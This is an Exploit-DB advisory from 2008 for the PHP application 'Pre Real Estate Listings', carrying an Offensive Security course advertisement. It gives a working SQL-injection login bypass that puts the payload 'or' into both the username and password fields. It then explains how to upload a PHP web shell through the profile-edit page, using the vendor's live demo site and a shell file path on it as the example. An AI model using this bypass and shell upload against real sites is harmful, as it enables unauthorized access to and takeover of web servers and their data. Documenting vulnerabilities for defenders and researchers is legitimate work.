Pre Real Estate Listings - Arbitrary File Upload

EDB-ID:

7094


Author:

BackDoor

Type:

webapps


Platform:

PHP

Date:

2008-11-11


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Pre Real Estate Listings (login.php) ByPass /File Upload
Script:Pre Real Estate Listings
HomePage:http://preproject.com/
Demo:http://preproject.com/ulisting/
Author:BackDoor
By Pass Exploit:
http://victim.com/scriptpath/login.php username:'or' password:'or'
Live Demo:
http://preproject.com/ulisting/login.php
File Upload Exploit:
login live demo username:'or' password:'or'
Edit Your Profile Link:http://preproject.com/ulisting/profile.php
Upload Your Shell:
Example:
http://preproject.com/ulisting/re_images/1221553817_logo_wp.php
 
Cyber-Security TIM //Lojistik

# milw0rm.com [2008-11-11]